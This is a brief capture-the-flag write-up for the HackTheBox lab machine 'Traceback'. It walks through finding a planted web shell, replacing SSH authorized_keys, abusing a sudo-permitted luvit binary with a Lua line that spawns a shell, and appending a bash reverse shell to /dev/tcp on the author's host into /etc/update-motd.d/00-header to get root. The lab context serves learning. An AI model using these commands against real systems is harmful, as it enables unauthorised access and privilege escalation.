HackTheBox — Traceback

Summary

Traceback is a easy flag with ip 10.10.10.181

Enumeration

I tried to take a look for source

From the hint, I searched for Xh4H web shells, I found some shells

I dumped all shells names on txt file and used gobuster

I used admin:admin credentials to login

After that i deleted the default authorized_keys and upload my one

Let’s login now

Get user sysadmin

$ sudo -l
Matching Defaults entries for webadmin on traceback:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvit

Afetr searching about lua
Create lua command shell:

echo "local t = os.execute('/bin/sh')" > rev.lua

execute rev.lua as sysadmin without password to get user:

sudo -u sysadmin /home/sysadmin/luvit rev.lua

Gain user flag!

Privilege Escalation

Enumerating the box using linpeas we see that we can modify files inside /etc/update-motd.d

I found this article that took about mot.d

I added a bash rev shell to 00-header

echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.xx.xx/4334 0>&1'" >> /etc/update-motd.d/00-header

listen on port 4334 and ssh to the box from another terminal

Now if we ssh as webadmin, Should get root

root@strike:~# ssh -i id_rsa webadmin@10.10.10.181
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land

8c221146c17c2a973a846f49xxxxxxxx


Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sat Aug 15 06:23:37 2020 from 10.10.14.53
webadmin@traceback:~$

Gain root flag!

If u learn any thing useful from write up, Respect me on HackTheBox

THX for ur time!

CTFer | Computer Science Student